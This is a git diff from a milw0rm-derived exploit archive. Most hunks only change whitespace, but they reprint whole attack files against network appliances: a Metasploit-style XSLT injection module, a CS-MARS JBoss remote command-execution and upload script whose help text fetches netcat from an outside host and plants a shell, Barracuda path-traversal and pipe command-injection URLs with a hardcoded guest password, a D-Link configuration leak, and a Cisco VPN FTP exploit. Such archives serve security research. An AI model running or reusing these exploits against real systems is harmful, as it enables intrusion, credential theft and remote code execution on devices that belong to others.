+ my $c = $lis->accept();
+ if (! $c) {
+ $self->PrintLine("[*] No connection received from the search engine, possibly patched.");
+ $lis->close;
+ return;
+ }
+
+ my $cli = Msf::Socket::Tcp->new_from_socket($c);
+ $self->PrintLine("[*] Connection received from ".$cli->PeerAddr."...");
+ $self->ProcessHTTP($cli);
+ return;
+}
+
+sub ConnectSearch {
+ my $self = shift;
+ my $s = Msf::Socket::Tcp->new(
+ 'PeerAddr' => $self->GetVar('RHOST'),
+ 'PeerPort' => $self->GetVar('RPORT'),
+ 'SSL' => $self->GetVar('SSL')
+ );
+
+ if ($s->IsError) {
+ $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+ return;
+ }
+ return $s;
+}
+
+sub ProcessHTTP
+{
+ my $self = shift;
+ my $cli = shift;
+ my $targetIdx = $self->GetVar('TARGET');
+ my $target = $self->Targets->[$targetIdx];
+ my $ret = $target->[1];
+ my $shellcode = $self->GetVar('EncodedPayload')->Payload;
+ my $content;
+ my $rhost;
+ my $rport;
+
+ # Read the first line of the HTTP request
+ my ($cmd, $url, $proto) = split(/ /, $cli->RecvLine(10));
+
+ # The way we call Runtime.getRuntime().exec, Java will split
+ # our string on whitespace. Since we are injecting via XSLT,
+ # inserting quotes becomes a huge pain, so we do this...
+ my $exec_str =
+ '/usr/bin/perl -e system(pack(qq{H*},qq{' .
+ unpack("H*", $self->GetVar('EncodedPayload')->RawPayload).
+ '}))';
+
+ # Load the template from our data section, we have to manually
+ # seek and reposition to allow the exploit to be used more
+ # than once without a reload.
+ seek(DATA, 0, 0);
+ while() { last if /^__DATA__$/ }
+ while() { $content .= $_ }
+
+ # Insert our command line
+ $content =~ s/:x:MSF:x:/$exec_str/;
+
+ # Send it to the requesting appliance
+ $rport = $cli->PeerPort;
+ $rhost = $cli->PeerAddr;
+ $self->PrintLine("[*] HTTP Client connected from $rhost, sending XSLT...");
+
+ my $res = "HTTP/1.1 200 OK\r\n" .
+ "Content-Type: text/html\r\n" .
+ "Content-Length: " . length($content) . "\r\n" .
+ "Connection: close\r\n" .
+ "\r\n" .
+ $content;
+
+ $self->PrintLine("[*] Sending ".length($res)." bytes...");
+ $cli->Send($res);
+ $cli->Close;
+}
+
+1;
+
+# milw0rm.com [2005-11-20]
diff --git a/platforms/hardware/remote/169.pl b/platforms/hardware/remote/169.pl
index 3b81493f0..e287e6085 100755
--- a/platforms/hardware/remote/169.pl
+++ b/platforms/hardware/remote/169.pl
@@ -410,6 +410,6 @@ sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Servic
 print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
 exit(1);
 }
-
-
-# milw0rm.com [2004-03-28]
+
+
+# milw0rm.com [2004-03-28]
diff --git a/platforms/hardware/remote/1889.txt b/platforms/hardware/remote/1889.txt
index 893eb5377..9dfdf320e 100755
--- a/platforms/hardware/remote/1889.txt
+++ b/platforms/hardware/remote/1889.txt
@@ -1,34 +1,34 @@ -# ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap) -# INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY -# http://www.intruders.com.br/ , http://www.intruders.org.br/ - -Making a HTTP request to the /cgi-bin/ directory, the Web server will return error 404 (Page not found). -Making a HTTP request to the /cgi-bin/AnyFile.htm, the Web server will return error 404 (Page not found). -However, making a HTTP request to any file in /cgi-bin/ directory, with .cfg extension, will return all the device configuration. - -For example, making the following request: - -http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg -We would have a result equivalent to the following: - -# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved -# DO NOT EDIT -- This configuration file is automatically generated -magic Ar52xxAP -fwc: 34 -login admin -DHCPServer -Eth_Acl -nameaddr -domainsuffix -IP_Addr 10.0.0.30 -IP_Mask 255.0.0.0 -Gateway_Addr 10.0.0.1 -RADIUSaddr -RADIUSport 1812 -RADIUSsecret -password IntrudersTest -passphrase -wlan1 passphrase AnewBadPassPhrase -# Several lines removed. - -# milw0rm.com [2006-06-08] +# ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap) +# INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY +# http://www.intruders.com.br/ , http://www.intruders.org.br/ + +Making a HTTP request to the /cgi-bin/ directory, the Web server will return error 404 (Page not found). +Making a HTTP request to the /cgi-bin/AnyFile.htm, the Web server will return error 404 (Page not found). +However, making a HTTP request to any file in /cgi-bin/ directory, with .cfg extension, will return all the device configuration. 
+ +For example, making the following request: + +http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg +We would have a result equivalent to the following: + +# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved +# DO NOT EDIT -- This configuration file is automatically generated +magic Ar52xxAP +fwc: 34 +login admin +DHCPServer +Eth_Acl +nameaddr +domainsuffix +IP_Addr 10.0.0.30 +IP_Mask 255.0.0.0 +Gateway_Addr 10.0.0.1 +RADIUSaddr +RADIUSport 1812 +RADIUSsecret +password IntrudersTest +passphrase +wlan1 passphrase AnewBadPassPhrase +# Several lines removed. + +# milw0rm.com [2006-06-08] diff --git a/platforms/hardware/remote/2048.pl b/platforms/hardware/remote/2048.pl index b4ebbbb3d..b147c4368 100755 --- a/platforms/hardware/remote/2048.pl +++ b/platforms/hardware/remote/2048.pl 
@@ -1,194 +1,194 @@ -#!/usr/bin/perl -# -# Cisco/Protego CS-MARS < 4.2.1 remote command execution, system compromise -# via insecure JBoss installation. -# -# Fully functional POC code by Jon Hart -# -# Addressed in CSCse47646 -# -# CS-MARS is an event correlation product orginally written by Protego, -# which is now owned by Cisco. It is built on top of JBoss. -# Unfortunately, little or no effort was put in to securing the JBoss -# installation as per the JBoss community's recommended best practices. -# A such, the usual set of JBoss interfaces are wide open and it is up to -# the attacker how creative they want to be in compromising the box. This -# particular exploit vector abuses the JBoss jmx-console for all sorts of -# fun. It should also be noted that, because of the very old kernel -# running on most CS-MARS boxes (2.4.9), once JBoss is compromised, root is -# almost trivial. Thanks to Cisco PSIRT and Matt Cerha for their -# cooperation in getting this fixed. -# -################################# -# Copyright (C) 2006 Jon Hart -# -# This program is free software; you can redistribute it and/or modify it -# under the terms of the GNU General Public License as published by the Free -# Software Foundation; either version 2 of the License, or (at your option) -# any later version. -# -# This program is distributed in the hope that it will be useful, but WITHOUT -# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or -# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for -# more details. 
-# -# You should have received a copy of the GNU General Public License along with -# this program; if not, write to the Free Software Foundation, Inc., 59 Temple -# Place, Suite 330, Boston, MA 02111-1307 USA -# -# -################################# -# - -use strict; -use HTTP::Request::Common; -use LWP::UserAgent; -use IO::Socket; - -my $target = shift(@ARGV) || &usage; -my $attack_type = shift(@ARGV) || &usage; - -for ($attack_type) { - if (/pass/) { &change_passwd(@ARGV); } - elsif (/cmd/) { &run_cmd(@ARGV); } - elsif (/upload/) { &upload(@ARGV); } - elsif (/[bean|bsh]/) { &run_bsh(@ARGV); } - else { &usage; } -} - -sub change_passwd { - my $passwd = shift; - &run_cmd("/opt/janus/release/bin/pnpasswd $passwd"); -} - -sub encode { - my $en = shift; - my $string = ""; - foreach my $char (split(//, $en)) { - if ($char =~ /([:|\/|(|)|"|'|`| ])/) { - $string .= sprintf("%%%x", ord($1)); - } else { $string .= $char; } - } - return $string; -} - -sub jmx_post { - my $form_data = shift; - my $ua = LWP::UserAgent->new; - $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"); - my $req = HTTP::Request->new(POST => "http://$target/jmx-console/HtmlAdaptor"); - $req->content_type('application/x-www-form-urlencoded'); - $req->content(&encode($form_data)); - - my $res = $ua->request($req); - - return $res->is_success ? 0 : $res->status_line; -} - -sub run_bsh { - my $file = shift; - my $bsh = ""; - open(BSH, "$file") or die "Couldn't open $file: $!\n"; - print("Sending beanshell from $file: "); - while () { - # the bsh must be one long string... - chomp(); - $bsh .= $_; - } - - printf("%s\n", &send_beanshell($bsh) == 0 ? 
"Success" : "Failed"); -} - -sub run_cmd { - my $cmd = shift; - my $code = ""; - - # & in the command needs to be encoded so as to not be confused with the & - # in the URI - $cmd =~ s/&/%26/g; - if ($cmd =~ />|\||&/) { - # exec() does not handle pipes or redirection well, so do this instead - $code = 'String sh = "/bin/sh"; String opt = "-c"; String cmd = "' - . $cmd . - '"; String[] exec = new String[] { sh, opt, cmd }; Runtime.getRuntime().exec(exec);'; - } else { - $code = "Runtime.getRuntime().exec(\"$cmd\");"; - } - - print("Running '$cmd' on $target: "); - printf("%s\n", &send_beanshell($code) == 0 ? "Success" : "Failed!"); -} - -sub send_beanshell { - my $code = shift; - # ensure the name of the bsh job within java has a unique name - my $name = "cmd" . int(rand(65535)) . $$; - return &jmx_post("action=invokeOp&name=jboss.scripts:service=BSHDeployer&methodIndex=1&arg0=$code&arg1=$name"); -} - -sub upload { - # upload a file. I was too lazy to use org.jboss.console.manager.DeploymentFileRepository - my $file = shift; - my $path = shift; - my $new_name = shift; - my $chunk = ""; - my $ret = 0; - open(FILE, "< $file") or die "Couldn't open $file for reading: $!\n"; - - if (!(defined($new_name))) { - my @path = split(/\//, $file); - $new_name = $path[$#path]; - } - - print("Uploading $file to $target...\n"); - &run_cmd("touch $path/$new_name"); - while(read(FILE,$chunk,4096)) { - # encode this file in 4096 byte chunks in a format that is able to be handled by JBoss. - # There are plenty of ways to do this, but none that were both portable and that didn't make JBoss - # throw a 500 or otherwise botch the file. UGLY. - $chunk = join('', map { sprintf("%03d,", ord("$_")) } split(//, $chunk)); - $ret += &run_cmd("echo -n $chunk | perl -ne 'foreach (split(/,/, \$_)) { print chr(\$_); }' >> $path/$new_name"); - } - - printf("Upload of $file to $target:$path/new_name %s!\n", $ret == 0 ? 
"succeeded" : "failed"); -} - - -sub usage { - print < - - Basic Usage: - $0 [ pass - Run shell command: - $0 cmd - Run BeanShell code: - $0 bsh /path/to/file/with/beanshell - Upload files: - $0 upload [] - - Fun Stuff: - Get a real shell: - $0 cmd "cp /opt/janus/release/bin/pnsh /opt/janus/release/bin/pnsh.bak" - $0 cmd "rm /opt/janus/release/bin/pnsh" - $0 cmd "cp /bin/sh /opt/janus/release/bin/pnsh" - # now ssh to the target... - [pnadmin\@pnmars bin]\$ id - uid=501(pnadmin) gid=501(pnadmin) groups=501(pnadmin) - [pnadmin\@pnmars bin]\$ uname -a - Linux pnmars 2.4.9-e.57 #1 Thu Dec 2 20:56:19 EST 2004 i686 unknown - [pnadmin\@pnmars bin]\$ hostname - pnmars - - Download something: - $0 cmd "curl http://yourhost/nc -o /tmp/nc" - -EOF -exit(1); -} - -# milw0rm.com [2006-07-20] +#!/usr/bin/perl +# +# Cisco/Protego CS-MARS < 4.2.1 remote command execution, system compromise +# via insecure JBoss installation. +# +# Fully functional POC code by Jon Hart +# +# Addressed in CSCse47646 +# +# CS-MARS is an event correlation product orginally written by Protego, +# which is now owned by Cisco. It is built on top of JBoss. +# Unfortunately, little or no effort was put in to securing the JBoss +# installation as per the JBoss community's recommended best practices. +# A such, the usual set of JBoss interfaces are wide open and it is up to +# the attacker how creative they want to be in compromising the box. This +# particular exploit vector abuses the JBoss jmx-console for all sorts of +# fun. It should also be noted that, because of the very old kernel +# running on most CS-MARS boxes (2.4.9), once JBoss is compromised, root is +# almost trivial. Thanks to Cisco PSIRT and Matt Cerha for their +# cooperation in getting this fixed. 
+# +################################# +# Copyright (C) 2006 Jon Hart +# +# This program is free software; you can redistribute it and/or modify it +# under the terms of the GNU General Public License as published by the Free +# Software Foundation; either version 2 of the License, or (at your option) +# any later version. +# +# This program is distributed in the hope that it will be useful, but WITHOUT +# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or +# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for +# more details. +# +# You should have received a copy of the GNU General Public License along with +# this program; if not, write to the Free Software Foundation, Inc., 59 Temple +# Place, Suite 330, Boston, MA 02111-1307 USA +# +# +################################# +# + +use strict; +use HTTP::Request::Common; +use LWP::UserAgent; +use IO::Socket; + +my $target = shift(@ARGV) || &usage; +my $attack_type = shift(@ARGV) || &usage; + +for ($attack_type) { + if (/pass/) { &change_passwd(@ARGV); } + elsif (/cmd/) { &run_cmd(@ARGV); } + elsif (/upload/) { &upload(@ARGV); } + elsif (/[bean|bsh]/) { &run_bsh(@ARGV); } + else { &usage; } +} + +sub change_passwd { + my $passwd = shift; + &run_cmd("/opt/janus/release/bin/pnpasswd $passwd"); +} + +sub encode { + my $en = shift; + my $string = ""; + foreach my $char (split(//, $en)) { + if ($char =~ /([:|\/|(|)|"|'|`| ])/) { + $string .= sprintf("%%%x", ord($1)); + } else { $string .= $char; } + } + return $string; +} + +sub jmx_post { + my $form_data = shift; + my $ua = LWP::UserAgent->new; + $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"); + my $req = HTTP::Request->new(POST => "http://$target/jmx-console/HtmlAdaptor"); + $req->content_type('application/x-www-form-urlencoded'); + $req->content(&encode($form_data)); + + my $res = $ua->request($req); + + return $res->is_success ? 
0 : $res->status_line; +} + +sub run_bsh { + my $file = shift; + my $bsh = ""; + open(BSH, "$file") or die "Couldn't open $file: $!\n"; + print("Sending beanshell from $file: "); + while () { + # the bsh must be one long string... + chomp(); + $bsh .= $_; + } + + printf("%s\n", &send_beanshell($bsh) == 0 ? "Success" : "Failed"); +} + +sub run_cmd { + my $cmd = shift; + my $code = ""; + + # & in the command needs to be encoded so as to not be confused with the & + # in the URI + $cmd =~ s/&/%26/g; + if ($cmd =~ />|\||&/) { + # exec() does not handle pipes or redirection well, so do this instead + $code = 'String sh = "/bin/sh"; String opt = "-c"; String cmd = "' + . $cmd . + '"; String[] exec = new String[] { sh, opt, cmd }; Runtime.getRuntime().exec(exec);'; + } else { + $code = "Runtime.getRuntime().exec(\"$cmd\");"; + } + + print("Running '$cmd' on $target: "); + printf("%s\n", &send_beanshell($code) == 0 ? "Success" : "Failed!"); +} + +sub send_beanshell { + my $code = shift; + # ensure the name of the bsh job within java has a unique name + my $name = "cmd" . int(rand(65535)) . $$; + return &jmx_post("action=invokeOp&name=jboss.scripts:service=BSHDeployer&methodIndex=1&arg0=$code&arg1=$name"); +} + +sub upload { + # upload a file. I was too lazy to use org.jboss.console.manager.DeploymentFileRepository + my $file = shift; + my $path = shift; + my $new_name = shift; + my $chunk = ""; + my $ret = 0; + open(FILE, "< $file") or die "Couldn't open $file for reading: $!\n"; + + if (!(defined($new_name))) { + my @path = split(/\//, $file); + $new_name = $path[$#path]; + } + + print("Uploading $file to $target...\n"); + &run_cmd("touch $path/$new_name"); + while(read(FILE,$chunk,4096)) { + # encode this file in 4096 byte chunks in a format that is able to be handled by JBoss. + # There are plenty of ways to do this, but none that were both portable and that didn't make JBoss + # throw a 500 or otherwise botch the file. UGLY. 
+ $chunk = join('', map { sprintf("%03d,", ord("$_")) } split(//, $chunk)); + $ret += &run_cmd("echo -n $chunk | perl -ne 'foreach (split(/,/, \$_)) { print chr(\$_); }' >> $path/$new_name"); + } + + printf("Upload of $file to $target:$path/new_name %s!\n", $ret == 0 ? "succeeded" : "failed"); +} + + +sub usage { + print < + + Basic Usage: + $0 [ pass + Run shell command: + $0 cmd + Run BeanShell code: + $0 bsh /path/to/file/with/beanshell + Upload files: + $0 upload [] + + Fun Stuff: + Get a real shell: + $0 cmd "cp /opt/janus/release/bin/pnsh /opt/janus/release/bin/pnsh.bak" + $0 cmd "rm /opt/janus/release/bin/pnsh" + $0 cmd "cp /bin/sh /opt/janus/release/bin/pnsh" + # now ssh to the target... + [pnadmin\@pnmars bin]\$ id + uid=501(pnadmin) gid=501(pnadmin) groups=501(pnadmin) + [pnadmin\@pnmars bin]\$ uname -a + Linux pnmars 2.4.9-e.57 #1 Thu Dec 2 20:56:19 EST 2004 i686 unknown + [pnadmin\@pnmars bin]\$ hostname + pnmars + + Download something: + $0 cmd "curl http://yourhost/nc -o /tmp/nc" + +EOF +exit(1); +} + +# milw0rm.com [2006-07-20] diff --git a/platforms/hardware/remote/2136.txt b/platforms/hardware/remote/2136.txt index 0cc623a6b..bd80e29cc 100755 --- a/platforms/hardware/remote/2136.txt +++ b/platforms/hardware/remote/2136.txt 
@@ -1,57 +1,57 @@ -Title: Barracuda Arbitrary File Disclosure + Command Execution -Severity: High (Sensitive Information Disclosure) -Date: 01 August 2006 -Version Affected: Barracuda Spam Firewall version 3.3.01.001 to 3.3.03.053 -Discovered by: Greg Sinclair (gssincla@nnlsoftware.com) - -Discovered on: 29 May 2006 - -Overview: -Barracuda Spam Firewalls (www.barracudanetworks.com) are vulnerable to -arbitrary file disclosure due to improper parameter sanitation. - - -Details: -The Barracuda Spam Firewalls from version 3.3.01.001 to 3.3.02.053 are vulnerable to -arbitrary file disclosure via the preview_email.cgi script. The /cgi- -bin/preview_email.cgi script is designed to retrieve a message from the local -message database on the Barracuda Spam Firewall. However, the "file" parameter which -is passed via GET is not properly sanitized to restrict the file retrieval to the -message database directories. The script looks for "/mail/mlog" in the file -parameter but does not take into account directory transversal arguments such as -".." The result is that any file that is accessible to the web server user is -accessible from the web interface. The script does require a valid user to be logged -in to perform this attack, however using the "Barracuda Hardcoded Password -Vulnerability" (NNL-20060801-01) guest password vulnerability this restriction can -easily be overcome. This particular problem is amplified by the fact that it is -possible to download the full configuration file for the barracuda. The -configuration file is periodically backed-up into the /tmp directory as -"/tmp/backup/periodic_config.txt.tmp" Message confidentiality is compromised by the -fact that an attacker who is able to view the message log screen (which can be done -via the guest password vulnerability) can easily view any message on the system. 
-The message logs are stored as /mail/mlog/X/Y/email_address/msgID where X is the -first character of email_address, Y is the second character of email_address, -email_address is the recipient's email address and msgID is the message ID assigned -to the message in question. So for example if jon@smith.com received a message with -messageID 1234, any user could view the message by entering -/mail/mlog/j/o/jon@smith.com/1234 - -Proof of Concept: - -https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp - -Command Execution by Matthew Hall - -https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/| - -Recommendations: -* Never allow your barracuda web interface to be accessible from untrusted networks (especially the Internet) -* Upgrade to version 3.3.0.54 or later - -Vendor Contact: -30 May 2006 - Initial Vendor Contact -24 June 2006 - Vendor replies with prospect of fix -17 July 2006 - NNL request status update, no reply -01 Aug 2006 - NNL releases vuln report, notifies vendor of release - -# milw0rm.com [2006-08-07] +Title: Barracuda Arbitrary File Disclosure + Command Execution +Severity: High (Sensitive Information Disclosure) +Date: 01 August 2006 +Version Affected: Barracuda Spam Firewall version 3.3.01.001 to 3.3.03.053 +Discovered by: Greg Sinclair (gssincla@nnlsoftware.com) + +Discovered on: 29 May 2006 + +Overview: +Barracuda Spam Firewalls (www.barracudanetworks.com) are vulnerable to +arbitrary file disclosure due to improper parameter sanitation. + + +Details: +The Barracuda Spam Firewalls from version 3.3.01.001 to 3.3.02.053 are vulnerable to +arbitrary file disclosure via the preview_email.cgi script. The /cgi- +bin/preview_email.cgi script is designed to retrieve a message from the local +message database on the Barracuda Spam Firewall. However, the "file" parameter which +is passed via GET is not properly sanitized to restrict the file retrieval to the +message database directories. 
The script looks for "/mail/mlog" in the file +parameter but does not take into account directory transversal arguments such as +".." The result is that any file that is accessible to the web server user is +accessible from the web interface. The script does require a valid user to be logged +in to perform this attack, however using the "Barracuda Hardcoded Password +Vulnerability" (NNL-20060801-01) guest password vulnerability this restriction can +easily be overcome. This particular problem is amplified by the fact that it is +possible to download the full configuration file for the barracuda. The +configuration file is periodically backed-up into the /tmp directory as +"/tmp/backup/periodic_config.txt.tmp" Message confidentiality is compromised by the +fact that an attacker who is able to view the message log screen (which can be done +via the guest password vulnerability) can easily view any message on the system. +The message logs are stored as /mail/mlog/X/Y/email_address/msgID where X is the +first character of email_address, Y is the second character of email_address, +email_address is the recipient's email address and msgID is the message ID assigned +to the message in question. 
So for example if jon@smith.com received a message with +messageID 1234, any user could view the message by entering +/mail/mlog/j/o/jon@smith.com/1234 + +Proof of Concept: + +https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp + +Command Execution by Matthew Hall + +https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/| + +Recommendations: +* Never allow your barracuda web interface to be accessible from untrusted networks (especially the Internet) +* Upgrade to version 3.3.0.54 or later + +Vendor Contact: +30 May 2006 - Initial Vendor Contact +24 June 2006 - Vendor replies with prospect of fix +17 July 2006 - NNL request status update, no reply +01 Aug 2006 - NNL releases vuln report, notifies vendor of release + +# milw0rm.com [2006-08-07] diff --git a/platforms/hardware/remote/2145.txt b/platforms/hardware/remote/2145.txt index 88996c44f..ac06d02ae 100755 --- a/platforms/hardware/remote/2145.txt +++ b/platforms/hardware/remote/2145.txt 
@@ -1,57 +1,57 @@ -Title: Barracuda Arbitrary File Disclosure + Command Execution -Severity: High (Sensitive Information Disclosure) -Date: 01 August 2006 -Version Affected: Barracuda Spam Firewall version 3.3.01.001 to 3.3.03.053 -Discovered by: Greg Sinclair -Credits: Matthew Hall -Update: 07 August 2006 -Updated by: PATz - -#################################################################### - -Proof of Concept: -https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp -https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/| - - -#################################################################### - -#using |unix| for command execution: - -https:///cgi-bin/preview_email.cgi?file=/mail/mlog/|uname%20-a| - -#admin login/pass vuln - -https:///cgi-bin/preview_email.cgi?file=/mail/mlog|cat%20update_admin_passwd.pl| -https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../bin/update_admin_passwd.pl - -eg. - -#`/home/emailswitch/code/firmware/current/bin/updateUser.pl guest phteam99 2>&1`; -login: guest pass: phteam99 - -some folder are accessible via http without permission -https:///Translators/ -https:///images/ -https:///locale -https:///plugins -https:///help - -#stuff in do_install - -/usr/sbin/useradd support -s /home/emailswitch/code/firmware/current/bin/request_support.pl -p swUpHFjf1MUiM - -## Create backup tmp dir - -/bin/mkdir -p /mail/tmp/backup/ -chmod -R 777 /mail/tmp/ - -## Create smb backup mount point -/bin/mkdir -p /mnt/smb/ -chmod 777 /mnt/smb/ - -................................. -Greetz to all noypi and phteam ^^, -.............eof................. 
- -# milw0rm.com [2006-08-08] +Title: Barracuda Arbitrary File Disclosure + Command Execution +Severity: High (Sensitive Information Disclosure) +Date: 01 August 2006 +Version Affected: Barracuda Spam Firewall version 3.3.01.001 to 3.3.03.053 +Discovered by: Greg Sinclair +Credits: Matthew Hall +Update: 07 August 2006 +Updated by: PATz + +#################################################################### + +Proof of Concept: +https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp +https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/| + + +#################################################################### + +#using |unix| for command execution: + +https:///cgi-bin/preview_email.cgi?file=/mail/mlog/|uname%20-a| + +#admin login/pass vuln + +https:///cgi-bin/preview_email.cgi?file=/mail/mlog|cat%20update_admin_passwd.pl| +https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../bin/update_admin_passwd.pl + +eg. + +#`/home/emailswitch/code/firmware/current/bin/updateUser.pl guest phteam99 2>&1`; +login: guest pass: phteam99 + +some folder are accessible via http without permission +https:///Translators/ +https:///images/ +https:///locale +https:///plugins +https:///help + +#stuff in do_install + +/usr/sbin/useradd support -s /home/emailswitch/code/firmware/current/bin/request_support.pl -p swUpHFjf1MUiM + +## Create backup tmp dir + +/bin/mkdir -p /mail/tmp/backup/ +chmod -R 777 /mail/tmp/ + +## Create smb backup mount point +/bin/mkdir -p /mnt/smb/ +chmod 777 /mnt/smb/ + +................................. +Greetz to all noypi and phteam ^^, +.............eof................. + +# milw0rm.com [2006-08-08] diff --git a/platforms/hardware/remote/254.c b/platforms/hardware/remote/254.c index f09e68108..fa75aafad 100755 --- a/platforms/hardware/remote/254.c +++ b/platforms/hardware/remote/254.c 
@@ -257,6 +257,6 @@ int main(int argc, char *argv[]) {
 brute();
 }
 }
-
-
-// milw0rm.com [2001-01-19]
+
+
+// milw0rm.com [2001-01-19]
diff --git a/platforms/hardware/remote/2638.c b/platforms/hardware/remote/2638.c
index 237dce22f..0cdd14576 100755
--- a/platforms/hardware/remote/2638.c
+++ b/platforms/hardware/remote/2638.c 
@@ -1,233 +1,233 @@ -/* Cisco VPN Concentrator 3000 FTP remote exploit - * ============================================== - * A vulnerability exists in the Cisco VPN Concentrator 3000, - * an unauthenticated user may access the file system through - * manipulation of FTP service commands. An unauthenticated - * user can use the following commands; - * - * CWD - Change the current working directory - * MKD - Make a directory within the current working directory - * CDUP - Change directory up one tree. - * RNFR - Rename From (This can be used to identify files and directories) - * SIZE - This can be used to identify files and directories - * RMD - This can be used to delete a directory - * - * The FTP service remembers the current working directory so directory - * changes can affect exploitation. By removing potentially sensitive - * directories such as "CERTS" it may be possible to disrupt service - * to a VPN. - * - * Confirmed Vulnerable - * + Cisco Systems Inc./VPN 3000 concentrator Version 4.1.5 RelJun 18 2004 - * - * Example. - * localhost exploits # ./prdelka-vs-CISCO-vpnftp -s 10.1.2.10 -c / - * [ Cisco VPN Concentrator 3000 FTP service exploit - * [ Connected to 10.1.2.10 (21/tcp) - * [ Changing directory to / - * [ Success! changed directory to / - * localhost exploits # ./prdelka-vs-CISCO-vpnftp -s 10.1.2.10 -t config - * [ Cisco VPN Concentrator 3000 FTP service exploit - * [ Connected to 10.1.2.10 (21/tcp) - * [ Testing for the existance of config - * [ Success! file config does exist! 
- * - * - * - prdelka - */ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -int main (int argc, char *argv[]){ - int ihost=0,index=0,imkdir=0,ichdir=0,idelete=0,itest=0,ipass=0,port=21; - int c, sd, rc, size; - char *host, *directory, *file, *buffer, *rbuffer; - struct sockaddr_in servAddr; - struct hostent *h; - static struct option options[]={ - {"server", 1, 0, 's'}, - {"port", 1, 0, 'p'}, - {"rmdir", 1, 0, 'r'}, - {"mkdir", 1, 0, 'm'}, - {"chdir", 1, 0, 'c'}, - {"test", 1, 0, 't'}, - {"help", 0, 0,'h'} - }; - printf("[ Cisco VPN Concentrator 3000 FTP service exploit\n"); - while(c != -1){ - c = getopt_long(argc,argv,"s:p:r:m:c:t:h",options,&index); - switch(c){ - case 's': - if(ihost==0){ - h = gethostbyname(optarg); - if(h==NULL){ - printf("[ Error unknown host '%s'\n",optarg); - exit(1); - } - host = malloc(strlen(optarg) + 1); - sprintf(host,"%s",optarg); - ihost = 1; - } - break; - case 'p': - port = atoi(optarg); - break; - case 'r': - if(idelete==0){ - if(ipass!=1){ - ipass = 1; - idelete = 1; - directory = optarg; - } - else{ - printf("[ Error: cannot delete directory as another option already selected\n"); - exit(1); - } - } - break; - case 'c': - if(ichdir==0){ - if(ipass!=1){ - ipass = 1; - ichdir = 1; - directory = optarg; - } - else{ - printf("[ Error: cannot change dir as another option already selected\n"); - exit(2); - } - } - break; - case 't': - if(itest==0){ - if(ipass!=1){ - ipass = 1; - itest = 1; - file = optarg; - } - else{ - printf("[ Error: cannot test for existance as another option already selected\n"); - exit(3); - } - } - break; - case 'm': - if(imkdir==0){ - if(ipass!=1){ - ipass = 1; - imkdir = 1; - directory = optarg; - } - else{ - printf("[ Error: cannot make directory as another option already selected\n"); - exit(4); - } - - } - break; - case 'h': - printf("[ Usage instructions.\n[\n"); - printf("[ %s (optional)\n[\n",argv[0]); - printf("[\t--server|-s \n[\t--port|-p (port) 
[default 21]\n[\t--rmdir|-r (directory)\n[\t--mkdir|-m (directory)\n"); - printf("[\t--chdir|-c (directory)\n[\t--test|-t (filename/directory)\n[\n"); - exit(0); - break; - default: - break; - } - } - if(ihost != 1 || ipass != 1){ - printf("[ Error insufficient arguements, try running '%s --help'\n",argv[0]); - exit(1); - } - servAddr.sin_family = h->h_addrtype; - memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length); - servAddr.sin_port = htons(port); - sd = socket(AF_INET, SOCK_STREAM, 0); - if(sd<0){ - printf("[ Cannot open socket\n"); - exit(1); - } - rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr)); - if(rc<0){ - printf("[ Cannot connect\n"); - exit(1); - } - printf("[ Connected to %s (%d/tcp)\n",host,port); - rbuffer = malloc(1024); - if(ichdir==1){ - printf("[ Changing directory to %s\n",directory); - size = 2048 + strlen(directory); - buffer = malloc(size); - sprintf(buffer,"CWD %s\r\n",directory); - rc = send(sd, buffer, strlen(buffer),0); - while((rc = recv(sd, rbuffer,1023,0)) != -1){ - rbuffer[rc]=0; - if(strstr(rbuffer,"250 Changed to .") != NULL){ - printf("[ Success! changed directory to %s\n",directory); - break; - } - if(strstr(rbuffer,"530 Can't change directory to") != NULL){ - printf("[ Error! cannot set current directory to %s\n",directory); - exit(-1); - } - } - } - if(imkdir==1){ - printf("[ Making directory %s\n",directory); - size = 2048 + strlen(directory); - buffer = malloc(size); - sprintf(buffer,"MKD %s\r\n",directory); - rc = send(sd, buffer, strlen(buffer),0); - while((rc = recv(sd, rbuffer,1023,0)) != -1){ - rbuffer[rc]=0; - if(strstr(rbuffer,"257 MKD command successful.") != NULL){ - printf("[ Success! 
